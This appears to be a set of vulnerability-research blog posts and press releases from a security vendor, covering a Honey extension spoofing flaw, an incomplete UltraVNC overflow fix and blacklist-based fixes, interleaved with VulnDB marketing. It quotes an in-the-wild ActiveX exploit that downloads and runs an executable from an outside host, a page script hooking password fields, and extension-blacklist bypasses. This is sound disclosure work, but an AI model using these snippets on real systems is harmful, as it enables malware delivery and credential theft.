
RBS Research Team Uncovers Vulnerability in Popular Honey Web Extension

Without the variety of browser extensions available today, the experience of using web browsers would be completely different. They are installed to manage passwords, block advertisements, or integrate functionality of all kinds into the browser.

Most browser extensions sit and wait silently in the background until summoned with a simple click of a button in the browser toolbar. The extensions then usually present a user interface dialog / window to configure or interact with them.

In this regard, the Honey browser extension is no different. The user visits a site and runs the extension to find available coupon codes. According to the vendor, the extension “automatically finds and applies coupon codes at checkout for over 30,000 shopping sites” and has been installed over 10 million times.

However, the extension’s behavior was noticeably different when activated from the browser toolbar. Normally an extension’s popup is drawn by the browser in its own window, anchored just below the toolbar button, which visibly marks it as separate from the page. The Honey dialog was instead displayed within the web page area.

Password Checkup extension in comparison to the Honey extension

A quick look using the Google Developer Tools revealed that the Honey UI element was indeed not an overlay on top of the browser window but injected into the web page.

div tag injected to web page by the Honey extension

What does this mean?

This is problematic because the injected elements, i.e. the extension’s user interface including its login form, are part of the visited page’s DOM, and page scripts can read, modify or replace anything in their own document. With a little bit of JavaScript on a web page that entices the user to activate the Honey extension, an attacker can spoof the Honey UI elements and steal the information the user enters. As a proof-of-concept, we developed a web page that displays the user’s password as it is entered (in a real-world scenario, the password would be silently sent to the attacker).

Proof-of-concept for stealing passwords
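The page-side half of that attack, as an added example that is not the RBS proof-of-concept and not Honey’s code: a script on the visited page waits for the extension’s container to be injected, then reads what the user types into any password field inside it. The container selector is an assumption (the real Honey markup is not reproduced here), and the captured values are kept in memory instead of being sent anywhere.

```javascript
// Added example, not the RBS proof-of-concept and not Honey's code. It shows the
// page-side half of the attack described above: because the extension renders
// its UI into the visited page's DOM, an ordinary page script can find those
// elements and read what the user types into them.
// Assumption: the injected container is located with a CSS selector; the real
// Honey markup is not reproduced here, so the selector below is a placeholder.
const INJECTED_UI_SELECTOR = 'div[data-injected-extension-ui]'; // assumed, not Honey's real markup

// Credentials the page script has seen. A real attacker would send these to a
// server; here they stay in memory so the behaviour can be inspected.
const captured = [];
const hookedFields = new WeakSet();

// Attach an 'input' listener to every password field under `root` and return
// how many fields were found. Page and injected elements share one document,
// so querySelectorAll sees the extension's inputs like any other node.
function hookPasswordFields(root) {
  const fields = root.querySelectorAll('input[type="password"]');
  for (const field of fields) {
    if (hookedFields.has(field)) continue; // idempotent across repeated scans
    hookedFields.add(field);
    field.addEventListener('input', (ev) => {
      captured.push({ ts: Date.now(), value: ev.target.value });
    });
  }
  return fields.length;
}

// The extension UI appears only after the user clicks the toolbar button, so
// watch the document for the container to show up, then hook it.
function watchForInjectedUi(doc, selector = INJECTED_UI_SELECTOR) {
  const scan = () => {
    const container = doc.querySelector(selector);
    if (container) hookPasswordFields(container);
  };
  scan();
  const observer = new MutationObserver(scan);
  observer.observe(doc.documentElement, { childList: true, subtree: true });
  return observer;
}

// A popup page or an iframe served from the extension's own origin would not be
// reachable this way: the page cannot script a cross-origin document.
if (typeof document !== 'undefined' && typeof MutationObserver !== 'undefined') {
  watchForInjectedUi(document);
}
```

The contrast is the point of the fix: a browser-action popup or an iframe whose source is an extension-origin page lives in a different document and origin, so the same script finds nothing to hook.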

Of course, other attacks may also be possible. In particular, Google and Facebook authentication dialogs could also be replicated to gain access to user passwords for those accounts. However, this attack is mitigated by the fact that pop-up windows present an address bar, thereby disclosing a spoofed domain, which should (hopefully) be detected by the user before entering a password.

Our Research Team reported the vulnerability to the developers at the end of 2018. A fix was released with version 11.3.0 for Chrome on April 16, 2019, and with version 11.3.5 for Firefox on May 15, 2019. For Edge on Windows, version 11.4.2.0 fixes the issue. At the time of writing, no updated version is available for Safari; Safari users are urged not to activate the extension on untrusted websites.

Research credit goes to Sven Krewitt, Senior Vulnerability Researcher

Video: Improve Your Vulnerability Response Using the New ServiceNow VulnDB Vulnerability Integration

Risk Based Security participated in ITS Partner’s webcast demonstrating the capabilities of the new ServiceNow VulnDB Vulnerability Integration.

Your security solution is only as good as the vulnerability data that drives it. Better data matters because it enables better prioritization decisions and quicker remediation. VulnDB contains comprehensive metadata and research on over 200,000 vulnerabilities, including over 69,000 that aren’t found in CVE or the National Vulnerability Database (CVE/NVD), and those numbers are growing quickly, with an average of about 70 new vulnerabilities disclosed every day.

In this webcast, Jake Kouns, CISO at Risk Based Security, joins Jay Wigard, Product Development Leader from ITS Partners, to discuss the challenges facing security professionals, and the valuable features of the new VulnDB Vulnerability Integration, available now as a free* download from the ServiceNow Store. The setup process is quick and simple. Check out the recorded webcast and start utilizing the ServiceNow platform to leverage asset information within your workflow.

Watch the video above, or download the VulnDB Vulnerability Integration app from the ServiceNow store today.

Interested in learning more about Risk Based Security’s suite of products? Click here to schedule a demo and see how much more comprehensive VulnDB is compared to other security solutions on the market.

* VulnDB subscription required

A Scanning Solution is Only as Good as the Vulnerability Data That Drives it

We had some great conversations at JFrog’s user conference, SwampUp 2019. Brian Martin, our Vice President of Vulnerability Intelligence, took part in an all-star keynote of experts where he discussed how our VulnDB® service helps secure JFrog Xray user pipelines.

The integration of VulnDB allows DevOps teams to discover, receive notifications on, and help remediate vulnerabilities in third-party libraries and dependencies early in the development cycle. As JFrog puts it, “a security scanning solution is only as good as the database of vulnerabilities that drives it.” Driven by Risk Based Security’s comprehensive data, Xray with VulnDB is the best security intelligence solution on the market for developers. 

Why does data from VulnDB give you an edge?

VulnDB is the most comprehensive source of vulnerability data available, with almost 69,000 vulnerabilities that are not found in CVE or the National Vulnerability Database (NVD). As Brian shared in his SwampUp keynote presentation, an average of about 70 new vulnerabilities are disclosed every day. This is an alarming volume, especially if your organization isn’t seeing the complete picture. That’s why our rallying cry is #BetterDataMatters. VulnDB is so much more advanced than any other database because we actively look for vulnerabilities and we speak with the DevOps community to ensure we are monitoring the libraries they are using. VulnDB includes more vulnerabilities, and carries more metadata and research on entries. This allows you to arm your organization with the most complete and up-to-date information available so you can make data-driven decisions to effectively manage and prioritize risk mitigation.

With this in mind, let’s look at some real-world applications. Recently, Sophos put out a very thought-provoking article. The article made some very interesting points:

  1. Most vulnerabilities aren’t exploited, and if they are, they tend to have a high CVSS score.
  2. There is apparently no relationship between the proof-of-concept (PoC) exploit code being published online and the start of real-world attacks.
  3. In order to patch vulnerabilities, a “reference tagging” machine learning model is the most efficient method.

Sophos based their conclusions on data provided in a whitepaper that researchers from Cyentia, Virginia Tech, and the RAND Corporation published. The findings were extremely engaging; however, the data used to support these claims is lacking…comprehensiveness.

Looking further into the data provided, it’s apparent that the researchers relied very heavily on security sensors based on CVE IDs, meaning that only vulnerabilities within CVE were being considered. This means that there are almost 69,000 vulns being missed in this study. To make matters worse, security scanning devices tend to cover half of the vulnerabilities in CVE, which makes the subset of data even smaller. 

In addition, Risk Based Security believes the machine learning models used in the study may have mis-categorized focused attacks. In situations where someone determines that a remote target is running specific software, then tries a comprehensive list of attacks against it, a detected attack would likely be labeled incorrectly. Since the researchers were basing their findings off of CVE data, it is highly likely that their sensors were not aware of specific vulnerabilities, resulting in a label of “Generic XSS” for example. This could have skewed results.

Last, these types of reports typically don’t share their full methodology, let alone what they are capable of matching against. This means that there is no way to reproduce or validate their findings. Unfortunately, if the research is solely based on CVE data, several vendors performing a similar study will arrive at the same rough figures. CVE is the industry “standard,” yet it is missing a huge amount of vulnerabilities, many of them with high CVSS scores and affecting major vendors. As previously stated, “a security scanning solution is only as good as the database of vulnerabilities that drives it.”

#BetterDataMatters. We would be very interested if the findings presented would be the same if more up-to-date data was used.

Interested in learning more about Risk Based Security’s suite of products? Click here to schedule a demo and see how much more comprehensive VulnDB is compared to other security solutions on the market.

Integrate Better Data from VulnDB into RSA Archer

RSA Archer® is a staple within the risk management community. Recognized as a leader in the 2018 Gartner Magic Quadrant for integrated risk management, RSA Archer allows organizations of all sizes to manage multiple dimensions of risk within its software platform. And now, you can integrate the world-leading vulnerability intelligence from VulnDB® directly into RSA Archer.

Introducing the VulnDB Data Feed for RSA Archer IT Security Vulnerabilities Program. Vulnerability Management is a key component of an integrated risk management strategy. Your organization can now combine the power and flexibility of RSA Archer with the rich vulnerability data of Risk Based Security’s VulnDB service. Some of the many highlights include:

  • Comprehensive and timely vulnerability intelligence. Get access to over 200,000 vulnerabilities, 68,000 of which are not found in CVE/NVD.
  • Surface potential vulnerabilities by matching asset and software data within RSA Archer to VulnDB’s extensive product associations.
  • Prioritize risk management using VulnDB without needing an additional vulnerability scan.

“The RSA Archer IT Security Vulnerabilities Program is a very powerful tool for surfacing and managing vulnerability-related risks. With the VulnDB Data Feed, organizations can ensure they are using the best available data to inform that analysis process.” – Eric Paxton, Director of Business Operations, Risk Based Security

With a VulnDB subscription and the VulnDB Data Feed, you can investigate vulnerabilities within your software and make improved and timely risk prioritization and mitigation decisions. New vulnerabilities can be surfaced and remediated without the need to wait for results from another vulnerability scan. As a result, organizations can continuously monitor their environment for new vulnerabilities and potential exploits and greatly reduce their risk window.

Get the VulnDB Data Feed for RSA Archer from the RSA Link portal today*.

* VulnDB subscription required

About VulnDB

VulnDB is the most comprehensive and timely vulnerability intelligence available and provides actionable information about the latest in security vulnerabilities via an easy-to-use SaaS Portal, or a RESTful API for easy integration into GRC tools and ticketing systems. VulnDB allows organizations to search on and be alerted to the latest vulnerabilities, both in end-user software and the third-party libraries or dependencies that help build applications. A subscription to VulnDB provides organizations with simple to understand ratings and metrics on their vendors and products, and how each contributes to the organization’s risk-profile and cost of ownership.

For more information visit vulndb.cyberriskanalytics.com or call 855-RBS-RISK

Already using VulnDB? Risk Based Security has a suite of products that enables organizations to make data-driven decisions to effectively manage and prioritize risk mitigation. See how our other products, Cyber Risk Analytics and YourCISO, can help you or your vendors stay secure in this rapidly evolving environment.

Software Vulnerability Management with Device42 and VulnDB

At Risk Based Security, we’ve always believed that one of the critical components of effective security is knowing your vendors and assets, understanding the threats and vulnerabilities that may impact those vendors and assets, and then using that data to prioritize mitigation actions.

That’s why we’re excited to announce the VulnDB® integration into the Device42 platform. With this new integration, Device42 customers can easily map the best-in-class vulnerability information from VulnDB to the asset data discovered by Device42 and view a near-real time list of vulnerable software in their environment. In addition, much of the rich metadata from VulnDB is available directly within Device42 to help organizations understand the most critical vulnerabilities and assets that should receive attention first, yielding a truly risk-based approach.

Experience the power of Device42 + VulnDB for yourself at www.device42.com/integrations/vulndb/

Check your entire IT deployment against VulnDB, automatically

Device42 is a comprehensive, centralized, and cost-effective CMDB solution that automatically discovers and maps your entire IT infrastructure. Integrate VulnDB to:

  • View a near-real time list of vulnerable software – and where it’s running
    Use Device42 + VulnDB to see an up-to-date list of machines running software instances
    with disclosed vulnerabilities – on demand.
  • Understand vulnerability details
    See software type, license model, vendor, category, license count, and more for each
    software component, and click the ID to see full vulnerability details.
  • API access to vulnerabilities
    Search by software ID and quickly see all disclosed vulnerabilities.

Experience the power of Device42 + VulnDB for yourself! Visit https://www.device42.com to learn more about Software Vulnerability Management within Device42 and how it could benefit you.

Contact Device42

Device42, Inc.
600 Saw Mill Road
West Haven, CT 06516

1 (844) 424-2422 | 1 (203) 409-7242



Vulnerabilities disclosed during the first three months of 2019 reach a Q1 all-time high

RICHMOND, VA, May 16, 2019 — Risk Based Security today released the Q1 2019 Vulnerability QuickView Report.

There were 5,501 vulnerabilities aggregated by Risk Based Security’s VulnDB that were disclosed during the first three months of 2019. This represents a 1% increase over the same period in 2018, making this Q1 an all-time high.

CVSSv2 scores of 9.0+, deemed critical issues, accounted for 14.0% of all published Q1 2019 vulnerabilities.

Risk Based Security’s VulnDB published 2,539 (85%) more vulnerabilities than CVE/NVD in the first quarter. 45.8% of the vulnerabilities not published by NVD/CVE have a CVSS score of either 7.0 – 8.99 (high) or 9.0 – 10.0 (critical).

“This continues to illustrate the need for a comprehensive vulnerability intelligence feed and a mature process that can quickly determine the true risk and lead the organization to address issues in a risk-based methodology,” commented Brian Martin, VP of Vulnerability Intelligence at Risk Based Security.

Just over half of all reported vulnerabilities in Q1 2019 have a remote attack vector, followed by almost a third having a user-assisted or context-dependent attack vector. Unlike previous quarters, over 13% of the reported vulnerabilities require local access to a system or device. While many are quick to dismiss local attacks as less risky, the increasing use of virtualization and mobile devices may give an attacker a foothold on a device, making local privilege escalation attacks more worrisome.

“The year-after-year increase in vulnerabilities being disclosed is clear, but there is no better example of the growing threats than this: in the last 24 hours, while finishing the Q1 2019 report, we pushed 241 new vulnerabilities to VulnDB,” commented Martin. “That should be an eye-opener and a serious concern to any organization, regardless of size or industry.”

Get your copy of the Q1 2019 Vulnerability QuickView Report

About the Vulnerability QuickView Report

The VulnDB QuickView report is possible through the research conducted by Risk Based Security. It is designed to provide an executive level summary of the key findings from RBS’ aggregation of vulnerabilities disclosed in Q1 2019. Contact Risk Based Security for a specific analysis of the vulnerabilities of critical relevance to your organization.

Risk Based Security Announces New Integration with Recorded Future for Intelligence-Driven Vulnerability Management

Risk Based Security, Inc., a provider of detailed information and analysis on Vulnerability Intelligence, Data Breaches, and Vendor Risk Ratings, today announced a new partnership with Recorded Future, the leading threat intelligence company, to help joint customers more effectively identify and prioritize the vulnerabilities they should mitigate.

Recorded Future and VulnDB logos

Risk Based Security’s VulnDB is the most comprehensive and timely vulnerability intelligence solution available. It provides actionable information about the latest in security vulnerabilities, both in end-user software and the third-party libraries or dependencies that help build applications. It enables security professionals to quickly and thoroughly analyze and respond to possible threats to their organization, helping safeguard them against the considerable costs and damage, to both data and reputation, that may result from an unmanaged vulnerability. The integration of the best-in-class vulnerability data from VulnDB into the Recorded Future analysis platform enables security teams to not only prioritize the vulnerabilities needing mitigation more effectively but also enrich and enhance their ability to respond to indicators of compromise.

The Recorded Future Connect partner program is laser focused on providing intelligence that helps teams make faster, more confident decisions by integrating rich threat intelligence into all security processes. Today, partners represent leading SIEM, incident response, ticketing, link analysis, security infrastructure, security orchestration and automation, vulnerability management, and threat intelligence platform (TIP) solutions.

“In 2018 alone, more than 22,000 vulnerabilities were added to the VulnDB database – more than any security team could manually identify and analyze on their own, never mind the actual patching and mitigation when a company is at risk. We’re proud to partner with Risk Based Security and believe the goal they’re working toward is foundational to cybersecurity teams’ ability to protect their organizations.” – Glenn Wong, Director of Product Management and Technology Partnerships, Recorded Future

VulnDB contains over 67,000 additional vulnerabilities not found in the frequently relied-upon Common Vulnerabilities and Exposures (CVE) database, and a much higher degree of information for each vulnerability, providing the richest, most complete vulnerability intelligence available. VulnDB helps customers better address points of risk across their organization – from application development and IT infrastructure management to security operations, vendor risk management, and procurement.

“Better data matters when it comes to effectively prioritizing and remediating vulnerabilities,” said Jake Kouns, Chief Information Security Officer at Risk Based Security. “With the VulnDB Intelligence Card extension for Recorded Future, our joint customers can access VulnDB’s extensive vulnerability intelligence from within the Recorded Future platform to provide additional valuable context and better respond to growing threats.”

About Risk Based Security

Risk Based Security (RBS) provides detailed information and analysis on Data Breaches, Vendor Risk Ratings and Vulnerability Intelligence. Our products, Cyber Risk Analytics (CRA) and VulnDB, provide organizations access to the most comprehensive threat intelligence knowledge bases available, including advanced search capabilities, access to raw data via API, and email alerting to assist organizations in taking the right actions in a timely manner. In addition, our YourCISO offering provides organizations with on-demand access to high quality security and information risk management resources in one, easy to use web portal.


For more information, please visit www.riskbasedsecurity.com or vulndb.cyberriskanalytics.com, call 855-RBS-RISK or contact us here.

About Recorded Future

Recorded Future delivers the only complete threat intelligence solution powered by patented machine learning to lower risk. We empower organizations to reveal unknown threats before they impact business, and enable teams to respond to alerts 10 times faster. To supercharge the efforts of security teams, our technology automatically collects and analyzes intelligence from technical, open web, and dark web sources and aggregates customer-proprietary data. Recorded Future delivers more context than threat feeds, updates in real time so intelligence stays relevant, and centralizes information ready for human analysis, collaboration, and integration with security technologies. 91 percent of the Fortune 100 use Recorded Future. Learn more at www.recordedfuture.com and follow us on Twitter at @RecordedFuture.

Request a demo of Recorded Future: https://go.recordedfuture.com/demo

Vulnerability Fixes That Make You Go Hmm…

The VulnDB research team processes a large number of vulnerability reports, exploits, and vendor advisories on a daily basis. Each report is scrutinized, classified and added to the VulnDB vulnerability database, enriched with important details like affected versions and requirements for exploitation, and sometimes with a note that the vendor’s fix is incorrect.

The lack of available detail in public reports and disclosures often requires us to dig deeper to create the meaningful intelligence VulnDB is famous for. In some cases, our investigations lead our research team to suspect that something doesn’t quite add up.

In early March 2019, Kaspersky Lab published information about a stack-based buffer overflow that caught our attention. While such conditions have the potential to allow code execution, the advisory only states denial of service (DoS) as the potential impact. Exploitation also requires user interaction. This was something worth investigating further. The assessment of the affected versions (“UltraVNC before 1.2.2.3”) and the fix (revision 1206) also raised some questions, but first, let’s evaluate the vulnerability itself.

Looking at the fixing changeset, the affected function ClientConnection::ShowConnInfo() was changed to address the reported stack-based buffer overflow. This appeared to be triggerable by a specially crafted VNC server when the viewer displays connection information.

screenshot of code including the snprintf function

So far, so good. A sprintf() type function is replaced by _snprintf() with a buffer length limitation. However, looking at a larger part of the function context raised some eyebrows.

screenshot of code limiting the size when invoking _snprintf to 20148

The savvy developer may have already spotted the issue here. The destination buffer is only 2048 bytes in size. Limiting the _snprintf() call to 20148 characters, apparently a typo for 2048, does not bound the write to the buffer, so the stack-based buffer overflow remains. (Even with the right bound, the Microsoft CRT’s _snprintf() does not NUL-terminate the output when it fills the buffer completely, so a correct fix also has to terminate the string explicitly or reserve a byte for the terminator.) We downloaded version 1.2.2.3, as “UltraVNC before 1.2.2.3” was reported vulnerable. That’s when we noticed that 1.2.2.3 was released November 11, 2018, about two months before the fix in the repository.


At this point we have:

  • A stack-based buffer overflow, reported as DoS only
  • A typo in the fix, which looks insufficient
  • Ambiguous version information

When it comes to creating VulnDB entries, we are sometimes driven by what we call VulnDB OCD. We decided to keep digging and figure out what was really going on.

To trigger the vulnerability, we need to run a VNC server that controls one of the parameters used in the _snprintf() call. This can be done via the desktop name sent in the ServerInit message (see RFC 6143, The Remote Framebuffer Protocol). We implemented a proof-of-concept using libvncserver, changing the response in the rfbProcessClientInitMessage() function in rfbserver.c.
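The message that carries the attacker-controlled name, as an added example that is not the RBS libvncserver proof-of-concept: a ServerInit encoder as a malicious server would use it (no cap on the name length) next to a viewer-side parser that refuses a name longer than the buffer that will hold it. The pixel-format values, the 2048-byte limit (taken from the destination buffer size discussed above) and the sample names are assumptions for the demonstration.

```javascript
// Added example, not the RBS libvncserver proof-of-concept. It encodes the RFB
// ServerInit message (RFC 6143, section 7.3.2) that a server sends after the
// client's ClientInit, with the desktop name under the server's control, and a
// viewer-side parser that bounds that name before storing it.
// Layout, all big-endian:
//   framebuffer-width(2) framebuffer-height(2) server-pixel-format(16)
//   name-length(4) name-string(name-length)

// A typical 32bpp true-colour pixel format; the values are illustrative.
const PIXEL_FORMAT = {
  bitsPerPixel: 32, depth: 24, bigEndian: 0, trueColour: 1,
  redMax: 255, greenMax: 255, blueMax: 255, redShift: 16, greenShift: 8, blueShift: 0,
};

function encodePixelFormat(pf) {
  const b = Buffer.alloc(16); // bytes 13..15 are padding and stay zero
  b.writeUInt8(pf.bitsPerPixel, 0);
  b.writeUInt8(pf.depth, 1);
  b.writeUInt8(pf.bigEndian, 2);
  b.writeUInt8(pf.trueColour, 3);
  b.writeUInt16BE(pf.redMax, 4);
  b.writeUInt16BE(pf.greenMax, 6);
  b.writeUInt16BE(pf.blueMax, 8);
  b.writeUInt8(pf.redShift, 10);
  b.writeUInt8(pf.greenShift, 11);
  b.writeUInt8(pf.blueShift, 12);
  return b;
}

// Server side: build ServerInit for an arbitrary desktop name. There is no
// length cap here, which is exactly what a malicious server relies on.
function buildServerInit(width, height, desktopName, pf = PIXEL_FORMAT) {
  const name = Buffer.from(desktopName, 'latin1');
  const geometry = Buffer.alloc(4);
  geometry.writeUInt16BE(width, 0);
  geometry.writeUInt16BE(height, 2);
  const nameLength = Buffer.alloc(4);
  nameLength.writeUInt32BE(name.length, 0);
  return Buffer.concat([geometry, encodePixelFormat(pf), nameLength, name]);
}

// Viewer side: parse ServerInit and refuse a name longer than the buffer that
// will hold it. The limit must be the real size of the destination (2048 here,
// an assumption matching the buffer discussed above), not a mistyped one.
function parseServerInit(buf, maxNameLength = 2048) {
  if (buf.length < 24) throw new Error('ServerInit truncated');
  const nameLength = buf.readUInt32BE(20);
  if (nameLength > maxNameLength) {
    throw new Error(`desktop name length ${nameLength} exceeds ${maxNameLength}`);
  }
  if (buf.length < 24 + nameLength) throw new Error('ServerInit name truncated');
  return {
    width: buf.readUInt16BE(0),
    height: buf.readUInt16BE(2),
    bitsPerPixel: buf.readUInt8(4),
    name: buf.subarray(24, 24 + nameLength).toString('latin1'),
  };
}

// Constructed inputs: a benign name and an oversized one of the kind that
// overflowed the viewer's buffer when it formatted the connection info.
function demo() {
  const benign = buildServerInit(1024, 768, 'desk');
  const hostile = buildServerInit(1024, 768, 'A'.repeat(4096));
  let rejected = false;
  try { parseServerInit(hostile); } catch (e) { rejected = true; }
  return { benignLength: benign.length, hostileLength: hostile.length, rejected };
}
```

A viewer that instead keeps the oversized name and later formats it into a fixed 2048-byte stack buffer with an unbounded (or mis-bounded) _snprintf() is the situation the fix above was meant to address.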

screenshot of vncviewer.exe - pointer to next seh record

When connecting to our VNC server with vncviewer.exe, the stack-based buffer overflow is triggered once the user displays the connection information (e.g. via the title bar context menu). While this allows a wide range of stack memory to be overwritten, exploitation is hindered by modern mitigations such as DEP, SafeSEH and SEHOP, which is probably why the issue was initially classified as a denial of service. At this point, however, a bypass of these mitigations can’t be ruled out. In particular, ASLR (Address Space Layout Randomization) is not enabled for the application, which helps when using return-oriented programming (ROP) techniques to bypass e.g. DEP.

(As a side-note: a crash in a client application requiring user interaction, e.g. connecting to a specially crafted VNC server, would not be classified as a vulnerability, but rather a stability issue).

On March 14, 2019, a new version (1.2.2.4) was released, which still included the insufficient fix. We tested this version against our VNC server and, not surprisingly, could still reproduce the stack-based buffer overflow. We then contacted the vendor about the incomplete fix and quickly received a response that the issue was corrected with revision 1216, with the vendor silently updating the 1.2.2.4 download as of March 19, 2019.

The result of our brief excursion:

  • The denial of service non-issue turned out to be potentially exploitable for arbitrary code execution.
  • Version 1.2.2.3 was vulnerable, even though the advisory suggested otherwise.
  • Early downloads of 1.2.2.4 were affected due to a typo in the initial fix.
  • Only version 1.2.2.4 downloaded after March 19, 2019 addresses the vulnerability with a silent fix.

Hmmm indeed.

Learn more about how VulnDB and our research team can equip your security team with better data.

Blacklisting Limitations: Poor Cisco Fixes and Korean 0-days

Using blacklisting to fix vulnerabilities is rarely the right approach. That should not come as a surprise to anyone, and we all know variants of the saying: “The developer has to determine all cases of bad input; the attacker just has to determine the one that was missed.” Yet this does not stop vendors from still resorting to basic blacklisting approaches to “fix” vulnerabilities in their products.

In January 2019, Cisco addressed a vulnerability in their RV320 and RV325 VPN routers that allowed unauthenticated, remote attackers to disclose sensitive diagnostics information. This was possible by accessing the /cgi-bin/export_debug_msg.exp CGI program in the web-based management interface. The proper fix would be to ensure that only authenticated, privileged users can access the CGI program. Cisco decided on a different approach…

Last week, researchers disclosed that Cisco had simply blocked requests to the CGI program whose HTTP User-Agent header identifies curl. The reason is likely that the PoC provided to Cisco by the researcher used curl. Naturally, this “fix” is trivial to bypass by changing the User-Agent header sent with the request. Cisco has acknowledged that the original fix is incomplete and that they’re working on a new one.

Cisco are not the only ones to make mistakes like these. We recently completed a research project for some of our major Korean customers (more on that in a later post). As part of the project we reviewed the July 2014 version of a monthly report about malicious code trends published by KISA (Korea Internet & Security Agency). Pages 29 and 30 of the report show a JavaScript file with malicious code that exploited a 0-day vulnerability in the HandySoft HShell ActiveX control by combining three unsafe methods.

A snippet of the relevant code:

// obj is the HShell ActiveX control instance; its creation is not part of the snippet.
// All three methods are reachable from page script because the control is marked safe for scripting.
obj.DownloadFromURL("http://www.sdgfaith.com/files/env/image/jpg/last.gif", "c:\\windows\\temp\\SearchMon.exe", 1, 1);  // fetch the payload (disguised as a .gif) and write it to disk as an .exe
setTimeout(function() {
   if(obj.IsFileExist("c:\\windows\\temp\\SearchMon.exe"))   // wait for the download to complete
      obj.ShellExec("", "c:\\windows\\temp\\SearchMon.exe", "", "c:\\", 0, 0, 0);  // then launch it
}, 20000);

The methods in question are DownloadFromURL(), IsFileExist(), and ShellExec(). These are three method names one generally does not want to see in a safe-for-scripting ActiveX control, since downloading files and launching programs is not functionality a website should be able to reach.

At some point, the vendor attempted to fix these vulnerabilities. Instead of questioning whether these were sensible functions to have in a safe-for-scripting ActiveX control, the vendor instead opted – similar to Cisco – for a blacklisting approach. A validation function was introduced that restricts the file extensions that are accepted by the DownloadFromURL() and ShellExec() methods. However, the list is hardly exhaustive when it comes to dangerous file types, as it only covers: “.exe”, “.com”, “.bat”, “.cmd”, “.scr”, “.msi”, and “.vbs”. While it successfully blocked the 0-day exploit, there are many obvious dangerous file types not covered by this list. This makes it trivial to tweak the original exploit to bypass the check and still download and execute malicious code on a user’s system when visiting a web page.

Full details on the vulnerability are available in our research report.

In general, if a vendor’s immediate idea for fixing a vulnerability is to introduce a blacklist, they should pause and reconsider. What is the vulnerability’s root cause? In most cases, there is a much better way to solve it. If restrictions still seem like the right approach, the default should be a very limited whitelist. If a vendor can’t think of a good whitelist, they probably can’t come up with a good blacklist. In such cases, it’s very likely that the design of the functionality is just insecure.
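Both cases above, the Cisco User-Agent check and the HandySoft extension list, modelled side by side as an added example (not Cisco’s or HandySoft’s code): each blacklist “fix” sits next to the control that addresses the root cause, so the bypasses can be run directly. The exact matching logic of the real products is not public here, so the blacklist checks are assumptions that mirror the described behaviour; the session store, the allowlist contents and the sample file names are constructed for the demonstration.

```javascript
// Added example, not Cisco's or HandySoft's code. It models the two blacklist
// "fixes" discussed above, each next to the control that addresses the root
// cause. The real products' matching logic is not public here; the blacklist
// checks below are assumptions that mirror the described behaviour.

// Case 1: the diagnostics CGI gated on the User-Agent header (assumed model of
// the Cisco fix). Any client that does not announce itself as curl is let in.
function userAgentBlacklistGate(req) {
  const ua = (req.headers['user-agent'] || '').toLowerCase();
  return !ua.includes('curl');
}

// The root-cause fix: require an authenticated, privileged session and ignore
// what the client claims to be. `sessions` maps session id -> { role }.
function authenticatedAdminGate(req, sessions) {
  const match = (req.headers['cookie'] || '').match(/(?:^|;\s*)session=([^;]+)/);
  const session = match && sessions.get(match[1]);
  return Boolean(session && session.role === 'admin');
}

// Case 2: the extension blacklist the HandySoft fix introduced (list as given
// in the report above) applied to a download-and-execute API.
const EXTENSION_BLACKLIST = ['.exe', '.com', '.bat', '.cmd', '.scr', '.msi', '.vbs'];

// Allowlist alternative: name only what the feature legitimately needs. The
// set is an assumption; the point is that everything else is denied by default.
const EXTENSION_ALLOWLIST = ['.pdf', '.png', '.jpg', '.txt'];

// Last extension of a Windows or POSIX path, lower-cased; '' if there is none.
function extname(path) {
  const base = path.split(/[\\/]/).pop();
  const dot = base.lastIndexOf('.');
  return dot <= 0 ? '' : base.slice(dot).toLowerCase();
}

function extensionBlacklistAllows(path) {
  return !EXTENSION_BLACKLIST.includes(extname(path));
}

function extensionAllowlistAllows(path) {
  return EXTENSION_ALLOWLIST.includes(extname(path));
}

// Constructed file names of types the Windows shell will run via ShellExecute
// but the blacklist does not cover. Returns those each policy lets through.
function bypassCandidates() {
  const names = [
    'c:\\windows\\temp\\evil.hta', 'c:\\windows\\temp\\evil.js',
    'c:\\windows\\temp\\evil.jse', 'c:\\windows\\temp\\evil.wsf',
    'c:\\windows\\temp\\evil.pif', 'c:\\windows\\temp\\evil.cpl',
  ];
  return {
    throughBlacklist: names.filter(extensionBlacklistAllows),
    throughAllowlist: names.filter(extensionAllowlistAllows),
  };
}
```

Even the allowlist only narrows the damage; the root-cause fix for the ActiveX case is not to expose a download-and-execute primitive to web content at all, just as the root-cause fix for the CGI is authentication rather than any client-supplied header.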

200,000th Vulnerability Added To VulnDB (And Why You Should Care)

RICHMOND, VA, March 29, 2019 — Risk Based Security today announced the addition of the 200,000th vulnerability to VulnDB, the preeminent database of vulnerability intelligence. This significant record highlights the scale of the security challenges faced by organizations, and the sheer volume of data that they need to be able to process.

“With over 4,800 new vulnerabilities already disclosed in 2019, we are seeing an early indication that the security problems organizations have been facing aren’t going away this year, or anytime soon,” commented Jake Kouns, CISO for Risk Based Security.

The 200,000th addition is a reflected cross-site scripting (XSS) vulnerability [VulnDB ID 201564] in the popular Malware Information Sharing Platform (MISP). This milestone reflects the steady and ongoing disclosure of vulnerabilities in every type of software, even that which is designed to help achieve security.

The recently published 2018 Year End Vulnerability QuickView Report found that more than 22,000 new vulnerabilities were disclosed in 2018. Risk Based Security’s VulnDB research team works hard to track every vulnerability, with the highest priority given to issues that could impact their customers. This focus on having the broadest and most detailed intelligence possible has pushed VulnDB to catalogue 33% more disclosed vulnerabilities than are tracked by the industry-standard public sources, Common Vulnerabilities and Exposures (CVE) and the National Vulnerability Database (NVD). VulnDB is thereby able to provide organizations with the intelligence they need to make more informed risk decisions, based on over 66,000 additional vulnerabilities captured only in VulnDB.

The wider implication is clear: without better data, organizations cannot accurately prioritize critical issues. Risk Based Security’s mission is to ensure their clients have access to the data they require. “To understand what motivates us, look no further than our company name,” commented Jake Kouns. “We provide a platform and superior intelligence so our clients can make Risk Based Security decisions on how to better handle vulnerabilities and understand the vendor and products they rely on.”

“As the tools that help researchers find vulnerabilities improve, and as that pool of researchers grows, the rate of disclosures will continue to rise. Organizations will be forced to dedicate more time and resources to keep up with the risks posed,” said Brian Martin, VP of Vulnerability Intelligence at Risk Based Security.

VulnDB is the most complete and timely vulnerability intelligence available

About VulnDB

VulnDB is the most comprehensive and timely vulnerability intelligence available and provides actionable information about the latest in security vulnerabilities via an easy-to-use SaaS Portal, or a RESTful API that allows easy integration into GRC tools and ticketing systems.

VulnDB allows organizations to search and be alerted on the latest vulnerabilities, both in end-user software and in third-party libraries or dependencies. It features simple-to-understand ratings and metrics on their vendors and products, and on how each contributes to the organization’s risk profile and cost of ownership.

